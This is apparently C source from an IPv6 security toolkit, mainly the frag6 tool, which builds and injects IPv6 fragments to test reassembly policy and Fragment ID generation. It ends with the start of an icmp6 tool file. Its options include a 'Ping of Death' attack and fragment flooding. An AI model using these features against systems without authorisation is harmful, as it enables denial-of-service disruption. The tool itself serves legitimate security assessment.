sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block2)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr) + \ sizeof(struct ip6_frag) + sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr)+minfragsize)){ return; } test[1]= TIME_EXCEEDED; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block3)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr) + \ sizeof(struct ip6_frag) + sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr)+minfragsize)){ return; } test[2]= TIME_EXCEEDED; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block4)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr) + \ sizeof(struct ip6_frag) + sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr)+minfragsize)){ return; } test[3]= TIME_EXCEEDED; } else if(test_frag_pattern( ((unsigned char *) pkt_icmp6_icmp6 + sizeof(struct icmp6_hdr)), FRAG_BLOCK_SIZE, block5)){ if(!valid_icmp6_response2(idata, pkthdr, pktdata, sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr) + \ sizeof(struct ip6_frag) + sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr)+minfragsize)){ return; } test[4]= TIME_EXCEEDED; } else{ test[4]= UNKNOWN_COPY; } } /* * Function: send_fragment2() * * Sends an IPv6 for evaluating the fragment reassembly policy */ int send_fragment2(struct iface_data *idata, uint16_t ip6len, unsigned int id, unsigned int offset, unsigned int fsize, unsigned int order, \ char *block){ unsigned char *ptrend; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; fsize= (fsize>>3) << 3; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (ptr+sizeof(struct ip6_frag)+fsize) > (v6buffer+idata->mtu)){ puts("Unfragmentable part too large for current MTU"); return(-1); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ fh= (struct ip6_frag *) ptr; memset(ptr, 0, FRAG_HDR_SIZE); fh->ip6f_ident= htonl(id); if(order == LAST_FRAGMENT || order==ATOMIC_FRAGMENT){ m=0; } else{ m=IP6F_MORE_FRAG; } if(order==FIRST_FRAGMENT || order==ATOMIC_FRAGMENT) offset=0; fh->ip6f_offlg = (htons(offset) & IP6F_OFF_MASK) | m; *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) fh; ptr+= sizeof(struct ip6_frag); *prev_nh = IPPROTO_ICMPV6; if(order == FIRST_FRAGMENT || order==ATOMIC_FRAGMENT){ if((ptr+ sizeof(struct icmp6_hdr)) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while inserting ICMPv6 header"); return(-1); } icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = 0; icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr+= sizeof(struct icmp6_hdr); for(i=0; i< (fsize/8); i++){ memcpy(ptr, block, FRAG_BLOCK_SIZE); ptr += FRAG_BLOCK_SIZE; } ptrend=ptr; for(i=0; i< (ip6len-sizeof(struct icmp6_hdr)-fsize)/8; i++){ memcpy(ptr, block, FRAG_BLOCK_SIZE); ptr += FRAG_BLOCK_SIZE; } /* Length of the reassembled fragment */ ipv6->ip6_plen= htons(ip6len); icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); ptr= ptrend; /* Length of the current fragment */ ipv6->ip6_plen= htons(ptr-(v6buffer + MIN_IPV6_HLEN)); } else{ if((ptr+ fsize) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while inserting timestamp"); return(-1); } for(i=0; i< (fsize/8); i++){ memcpy(ptr, block, FRAG_BLOCK_SIZE); ptr += FRAG_BLOCK_SIZE; } ipv6->ip6_plen= htons(ptr-(v6buffer + MIN_IPV6_HLEN)); } if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(-1); } if(nw != (ptr- buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); return(-1); } return 0; } /* * Function: send_fragment() * * Sends an IPv6 fragment */ int send_fragment(struct iface_data *idata, unsigned int id, unsigned int offset, unsigned int fsize, \ unsigned int forder, unsigned int tstamp_f){ uint32_t tstamp; unsigned int i; ethernet= (struct ether_header *) buffer; dlt_null= (struct dlt_null *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } #if defined (__OpenBSD__) else if(idata->type == DLT_LOOP){ dlt_null->family= htonl(PF_INET6); } #endif ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); return(-1); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); return(-1); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } if(!fsize_f && (forder != LAST_FRAGMENT && forder != ATOMIC_FRAGMENT)){ fsize= (fsize>>3) << 3; } /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (ptr+sizeof(struct ip6_frag)+fsize) > (v6buffer+idata->mtu)){ printf("Unfragmentable part too large for current MTU (%u bytes)\n", idata->mtu); return(-1); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ fh= (struct ip6_frag *) ptr; memset(ptr, 0, FRAG_HDR_SIZE); fh->ip6f_ident= htonl(id); if(forder == LAST_FRAGMENT || forder == ATOMIC_FRAGMENT) m=0; else m=IP6F_MORE_FRAG; if((forder==FIRST_FRAGMENT || forder==ATOMIC_FRAGMENT) && !foffset_f) offset=0; fh->ip6f_offlg = (htons(offset) & IP6F_OFF_MASK) | m; *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) fh; ptr+= sizeof(struct ip6_frag); if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); return(-1); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_ICMPV6; if(forder == FIRST_FRAGMENT || forder == ATOMIC_FRAGMENT){ if((ptr+ fsize) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while inserting ICMPv6 header"); return(-1); } if(fsize < sizeof(struct icmp6_hdr)){ if(idata->verbose_f) puts("Fragment size too small to hold an ICMPv6 header"); return(-1); } icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = 0; icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr+= sizeof(struct icmp6_hdr); fsize-= sizeof(struct icmp6_hdr); if(tstamp_f && fsize >= (sizeof(uint32_t)+sizeof(uint32_t))){ if((ptr+ (sizeof(uint32_t) + sizeof(uint32_t))) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while inserting timestamp"); return(-1); } /* We include a timstamp to be able to measure the Fragment Reassembly timeout */ tstamp= (uint32_t) time(NULL); *(uint32_t *)ptr= tstamp; ptr+= sizeof(uint32_t); /* We include a "checksum" such that we can tell the responses we elicit from other packets */ *(uint32_t *)ptr= (uint32_t)tstamp ^ 0xabcdabcd; ptr+= sizeof(uint32_t); if(fsize > (sizeof(uint32_t)+sizeof(uint32_t))) fsize-= (sizeof(uint32_t)+sizeof(uint32_t)); else fsize=0; } for(i=0; i< (fsize/4); i++){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); } ipv6->ip6_plen= htons(ptr-(v6buffer + MIN_IPV6_HLEN)); icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-((unsigned char *)icmp6), IPPROTO_ICMPV6); } else{ /* XXX: Should check */ if(tstamp_f){ if((ptr+ (sizeof(uint32_t) + sizeof(uint32_t))) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while inserting timestamp"); return(-1); } /* We include a timstamp to be able to measure the Fragment Reassembly timeout */ tstamp= (uint32_t)time(NULL); *(uint32_t *)ptr= tstamp; ptr+= sizeof(time_t); /* We include a "checksum" such that we can tell the responses we elicit from other packets */ *(uint32_t *)ptr= (uint32_t)tstamp ^ 0xabcdabcd; ptr+= sizeof(uint32_t); if(fsize > (sizeof(uint32_t)+sizeof(uint32_t))) fsize-= (sizeof(uint32_t)+sizeof(uint32_t)); else fsize=0; } if((ptr+ fsize) > (v6buffer+idata->max_packet_size)){ puts("Packet too large while inserting payload"); return(-1); } for(i=0; i<(fsize/sizeof(uint32_t)); i++){ *(uint32_t *)ptr = random(); ptr += sizeof(uint32_t); } ipv6->ip6_plen= htons(ptr-(v6buffer + MIN_IPV6_HLEN)); } if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(-1); } if(nw != (ptr- buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); return(-1); } return 0; } /* * Function: send_fid_probe() * * Send a fragmented ICMPv6 Echo Request used for sampling the Fragment Identification * values sent by the target */ int send_fid_probe(struct iface_data *idata){ unsigned char fragbuffer[FRAG_BUFFER_SIZE]; struct ip6_frag *frag; struct ether_header *ethernet; struct ip6_hdr *ipv6; unsigned char *fptr, *fptrend; unsigned int i; ethernet= (struct ether_header *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->type == DLT_EN10MB){ ethernet->ether_type = htons(ETHERTYPE_IPV6); if(!(idata->flags & IFACE_LOOPBACK)){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; } } else if(idata->type == DLT_NULL){ dlt_null->family= PF_INET6; } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; ipv6->ip6_nxt= IPPROTO_FRAGMENT; /* ptr always points to the part of the original packet that is being crafted */ ptr = (unsigned char *) v6buffer + sizeof(struct ip6_hdr); frag= (struct ip6_frag *) ptr; memset(frag, 0, sizeof(struct ip6_frag)); frag->ip6f_nxt= IPPROTO_ICMPV6; ptr+= sizeof(struct ip6_frag); /* fragpart points to the beginning of the fragmentable part of the original packet */ fragpart= ptr; icmp6 = (struct icmp6_hdr *) ptr; icmp6->icmp6_type = ICMP6_ECHO_REQUEST; icmp6->icmp6_code = 0; icmp6->icmp6_cksum = 0; icmp6->icmp6_data16[0]= htons(getpid()); /* Identifier */ icmp6->icmp6_data16[1]= htons(random()); /* Sequence Number */ ptr+= sizeof(struct icmp6_hdr); *(uint32_t *)ptr= icmp6_sig; ptr+= sizeof(uint32_t); for(i=0;i<400; i++){ *(uint32_t *)ptr= random(); ptr+=sizeof(uint32_t); } icmp6->icmp6_cksum = in_chksum(v6buffer, icmp6, ptr-(unsigned char *)icmp6, IPPROTO_ICMPV6); /* ptrend points to the end of the original packet */ ptrend= ptr; ptr= fragpart; /* fptr points to the part of the fragment that is being crafted */ fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + idata->linkhsize); fptrend = fptr + FRAG_BUFFER_SIZE; /* Copy everything from the Ethernet header, up to (and including) the Fragmentation Header */ memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); fh= (struct ip6_frag *) (fragbuffer + idata->linkhsize + sizeof(struct ip6_hdr)); fh->ip6f_ident=random(); startoffragment = fptr; /* We'll be sending packets of at most 1280 bytes (the IPv6 minimum MTU) */ fragsize= ((MIN_IPV6_MTU - sizeof(struct ip6_hdr) - sizeof(struct ip6_frag)) >> 3) << 3; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent. This chec will always be passed, but is useful * when future versions of the tool support other link-layer technologies. */ if( (startoffragment + fragsize) > fptrend){ printf("Fragment size too large to fit into fragmentation buffer\n"); return(-1); } m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - idata->linkhsize); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); return(-1); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", \ (LUI) nw, (LUI) (ptr-buffer)); return(-1); } } /* Sending fragments */ return(0); } /* * Function: usage() * * Prints the syntax of the frag6 tool */ void usage(void){ puts("usage: frag6 -d DST_ADDR [-i INTERFACE] [-S LINK_SRC_ADDR] [-D LINK-DST-ADDR]\n" " [-s SRC_ADDR[/LEN]] [-A HOP_LIMIT] [-u DST_OPT_HDR_SIZE]\n" " [-U DST_OPT_U_HDR_SIZE] [-H HBH_OPT_HDR_SIZE] [-P FRAG_SIZE]\n" " [-O FRAG_TYPE] [-o FRAG_OFFSET] [-I FRAG_ID] [-T] [-n]\n" " [-p | -W | -X | -F N_FRAGS] [-l] [-z SECONDS] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the frag6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts( "frag6: A security assessment tool for attack vectors based on IPv6 fragments\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -A IPv6 Hop Limit\n" " --dst-opt-hdr, -u Destination Options Header (Fragmentable Part)\n" " --dst-opt-u-hdr, -U Destination Options Header (Unfragmentable Part)\n" " --hbh-opt-hdr, -H Hop by Hop Options Header\n" " --frag-size, -P IPv6 fragment payload size\n" " --frag-type, -O IPv6 Fragment Type {first, last, middle, atomic}\n" " --frag-offset, -o IPv6 Fragment Offset\n" " --frag-id, -I IPv6 Fragment Identification\n" " --no-timestamp, -T Do not include a timestamp in the payload\n" " --no-responses, -n Do not print responses to transmitted packets\n" " --frag-reass-policy, -p Assess fragment reassembly policy\n" " --frag-id-policy, -W Assess the Fragment ID generation policy\n" " --pod-attack, -X Perform a 'Ping of Death' attack\n" " --flood-frags, -F Flood target with IPv6 fragments\n" " --loop, -l Send IPv6 fragments periodically\n" " --sleep, -z Pause between sending IPv6 fragments\n" " --verbose, -v Be verbose\n" " --help, -h Print help for the frag6 tool\n" "\n" "Programmed by Fernando Gont for SI6 Networks (http://www.si6networks.com)\n" "Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ if(idata->type == DLT_EN10MB && !(idata->flags & IFACE_LOOPBACK)){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, (!idata->hsrcaddr_f)?" (automatically selected)":""); /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, (!idata->hdstaddr_f)?" (automatically selected)":""); } if(idata->srcaddr_f){ if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Source Address: %s%s\n", psrcaddr, ((idata->srcaddr_f != TRUE)?" (automatically selected)":"")); } if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (randomized)"); for(i=0; ilinkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_icmp6_icmp6= (struct icmp6_hdr *) ((unsigned char *) pkt_icmp6 + sizeof(struct icmp6_hdr) +\ sizeof(struct ip6_hdr) + MIN_HBH_LEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; switch(pkt_icmp6->icmp6_type){ case ICMP6_ECHO_REPLY: /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_icmp6) < (sizeof(struct icmp6_hdr) + \ fsize) && (pkt_end - (unsigned char *) pkt_ipv6) < MIN_IPV6_MTU){ return 0; } /* Check that the ICMPv6 checksum is correct */ if(in_chksum(pkt_ipv6, pkt_icmp6, pkt_end-((unsigned char *)pkt_icmp6), IPPROTO_ICMPV6) != 0){ return 0; } if(pkt_icmp6->icmp6_data16[0] != htons(getpid())){ return 0; } if(tstamp_f){ pkt_ptr= ((unsigned char *) pkt_icmp6+ sizeof(struct icmp6_hdr)); if( *((uint32_t *) pkt_ptr) != (*((uint32_t *) (pkt_ptr+sizeof(uint32_t))) ^ 0xabcdabcd)){ return 0; } } break; case ICMP6_TIME_EXCEEDED: /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ minfragsize= sizeof(struct ip6_hdr) + sizeof(struct icmp6_hdr)+sizeof(struct ip6_hdr) + \ sizeof(struct ip6_frag) + sizeof(struct icmp6_hdr) + (fsize_f?fsize:MIN_FRAG_SIZE) + \ (tstamp_f?(sizeof(time_t)+sizeof(uint32_t)):0); if( ((pkt_end - (unsigned char *) pkt_ipv6) < minfragsize) && \ (pkt_end - (unsigned char *) pkt_ipv6) < MIN_IPV6_MTU){ return 0; } pkt_ipv6_ipv6= (struct ip6_hdr *) ((unsigned char *)pkt_icmp6+ sizeof(struct icmp6_hdr)); pkt_fh_fh= NULL; pkt_ext= (struct ip6_ext *) ((unsigned char *)pkt_ipv6_ipv6 + sizeof(struct ip6_hdr)); pkt_prev_nh= (pkt_ipv6_ipv6->ip6_nxt); while(pkt_prev_nh != IPPROTO_ICMPV6 && \ ( (unsigned char *)pkt_ext + (pkt_ext->ip6e_len * 8 + 1)) < pkt_end){ if(pkt_prev_nh == IPPROTO_FRAGMENT) pkt_fh_fh= (struct ip6_frag *) pkt_ext; pkt_prev_nh= pkt_ext->ip6e_nxt; pkt_ext= (struct ip6_ext *) ( (unsigned char *)pkt_ext + ((pkt_ext->ip6e_len + 1) * 8)); } if(pkt_prev_nh == IPPROTO_ICMPV6){ pkt_icmp6_icmp6= (struct icmp6_hdr *) pkt_ext; if( ((unsigned char *) pkt_icmp6_icmp6 + (sizeof(struct icmp6_hdr)+ sizeof(struct ip6_hdr)+ \ sizeof(struct ip6_frag)+sizeof(struct icmp6_hdr))) > pkt_end){ return 0; } } else{ return 0; } if(pkt_fh_fh == NULL) return 0; /* * We can only check the embedded ICMPv6 header if the embedded fragment is the first fragment of * a packet */ if(ntohs(pkt_fh_fh->ip6f_offlg & IP6F_OFF_MASK) == 0){ if(pkt_icmp6_icmp6->icmp6_type != ICMP6_ECHO_REQUEST){ return 0; } if(pkt_icmp6_icmp6->icmp6_data16[0] != htons(getpid())){ return 0; } if(tstamp_f){ pkt_ptr= ((unsigned char *) pkt_icmp6_icmp6+ sizeof(struct icmp6_hdr)); if( *(uint32_t *) pkt_ptr != (*(uint32_t *) (pkt_ptr+sizeof(uint32_t)) ^ 0xabcdabcd)){ return 0; } } } else{ return 0; } break; default: return 0; break; } /* Check that the Source Address of the Packet is "valid" */ if(IN6_IS_ADDR_UNSPECIFIED(&(pkt_ipv6->ip6_src))){ return 0; } if(IN6_IS_ADDR_LOOPBACK(&(pkt_ipv6->ip6_src))){ return 0; } if(IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_src))){ return 0; } /* Check that that the Destination Address of the incoming packet is one of our addresses. */ if(!(floodf_f && srcprefix_f) && !is_eq_in6_addr(&(idata->srcaddr), &(pkt_ipv6->ip6_dst))){ return 0; } return 1; } /* * Function: valid_icmp6_response2() * * Checks whether the response to an ICMPv6 probe (for identifying the fragment reassembly policy) is valid */ int valid_icmp6_response2(struct iface_data *idata, struct pcap_pkthdr *pkthdr, const u_char *pktdata, unsigned int minsize){ struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6, *pkt_ipv6_ipv6; struct ip6_ext *pkt_ext; struct icmp6_hdr *pkt_icmp6, *pkt_icmp6_icmp6; struct ip6_frag *pkt_fh_fh; unsigned char *pkt_end; uint8_t pkt_prev_nh; pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_icmp6 = (struct icmp6_hdr *) ((char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_icmp6 + pkt_ipv6->ip6_plen; switch(pkt_icmp6->icmp6_type){ case ICMP6_ECHO_REPLY: /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_ipv6) < minsize && (pkt_end - (unsigned char *) pkt_ipv6) < MIN_IPV6_MTU){ return 0; } /* Check that the ICMPv6 checksum is correct */ if(in_chksum(pkt_ipv6, pkt_icmp6, pkt_end-((unsigned char *)pkt_icmp6), IPPROTO_ICMPV6) != 0){ return 0; } if(pkt_icmp6->icmp6_data16[0] != htons(getpid())){ return 0; } break; case ICMP6_TIME_EXCEEDED: /* Discard the packet if it is not of the minimum size to contain an ICMPv6 header and the payload we included in the ICMPv6 Echo Request */ if( (pkt_end - (unsigned char *) pkt_ipv6) < minsize \ && (pkt_end - (unsigned char *) pkt_ipv6) < MIN_IPV6_MTU){ return 0; } pkt_ipv6_ipv6= (struct ip6_hdr *) ((unsigned char *)pkt_icmp6+ sizeof(struct icmp6_hdr)); pkt_fh_fh= NULL; pkt_ext= (struct ip6_ext *) ((unsigned char *)pkt_ipv6_ipv6 + sizeof(struct ip6_hdr)); pkt_prev_nh= (pkt_ipv6_ipv6->ip6_nxt); while(pkt_prev_nh != IPPROTO_ICMPV6 && \ ( (unsigned char *)pkt_ext + (pkt_ext->ip6e_len * 8 + 1)) < pkt_end){ if(pkt_prev_nh == IPPROTO_FRAGMENT) pkt_fh_fh= (struct ip6_frag *) pkt_ext; pkt_prev_nh= pkt_ext->ip6e_nxt; pkt_ext= (struct ip6_ext *) ( (unsigned char *)pkt_ext + ((pkt_ext->ip6e_len + 1) * 8)); } if(pkt_prev_nh == IPPROTO_ICMPV6){ pkt_icmp6_icmp6= (struct icmp6_hdr *) pkt_ext; if( ((unsigned char *) pkt_icmp6_icmp6 + (sizeof(struct icmp6_hdr)+ sizeof(struct ip6_hdr)+ \ sizeof(struct ip6_frag)+sizeof(struct icmp6_hdr))) > pkt_end){ return 0; } } else{ return 0; } if(pkt_fh_fh == NULL){ return 0; } /* * We can only check the embedded ICMPv6 header if the embedded fragment is the first fragment of * a packet */ if(ntohs(pkt_fh_fh->ip6f_offlg & IP6F_OFF_MASK) == 0){ if(pkt_icmp6_icmp6->icmp6_type != ICMP6_ECHO_REQUEST){ return 0; } if(pkt_icmp6_icmp6->icmp6_data16[0] != htons(getpid())){ return 0; } } else{ return 0; } break; default: return 0; break; } /* Check that the Source Address of the Packet is "valid" */ if(IN6_IS_ADDR_UNSPECIFIED(&(pkt_ipv6->ip6_src))){ return 0; } if(IN6_IS_ADDR_LOOPBACK(&(pkt_ipv6->ip6_src))){ return 0; } if(IN6_IS_ADDR_MULTICAST(&(pkt_ipv6->ip6_src))){ return 0; } /* Check that that the Destination Address of the incoming packet is one of our addresses. */ if(!(floodf_f && srcprefix_f) && !is_eq_in6_addr(&(idata->srcaddr), &(pkt_ipv6->ip6_dst))){ return 0; } return 1; } /* * Function: test_frag_pattern() * * Check whether a specific pattern is present in a portion of an IPv6 fragment */ int test_frag_pattern(unsigned char *ptr, unsigned int size, char *block){ unsigned int i; for(i=0; i * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make icmp6 * * The libpcap library must be previously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "icmp6.h" #include "ipv6toolkit.h" #include "libipv6.h" /* Function prototypes */ void init_packet_data(struct iface_data *); void send_packet(struct iface_data *, const u_char *, struct pcap_pkthdr *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); /* Flags used for the ICMPv6 Redirect (specifically) */ unsigned int icmp6type_f=0, icmp6code_f=0, mtu_f=0, pointer_f=0; unsigned int targetaddr_f=0, redirprefix_f=0, targetportl_f=0, targetporth_f=0; unsigned int peeraddr_f=0, peerportl_f=0, peerporth_f=0; unsigned int rhip6_f=0, rhtcp_f=0, rhudp_f=0, rhicmp6_f=0, nopayload_f=0, rheader_f=0; unsigned int tcpseq_f=0, tcpack_f=0, tcpurg_f=0, tcpflags_f=0, tcpwin_f=0; unsigned int icmp6id_f=0, icmp6seq_f=0; unsigned int rhlength_f=0, floodr_f=0, respmcast_f=0, makeonlink_f=0; unsigned int ip6hoplimit_f=0, ip6length_f=0, rhdefault_f=0; unsigned int learnrouter_f=0, sanityfilters_f=0, useaddrkey_f=0; /* Variables used for ICMPv6 Error messages (specifically) */ uint8_t icmp6type=0, icmp6code=0; uint32_t mtu, pointer; uint16_t ip6length; struct 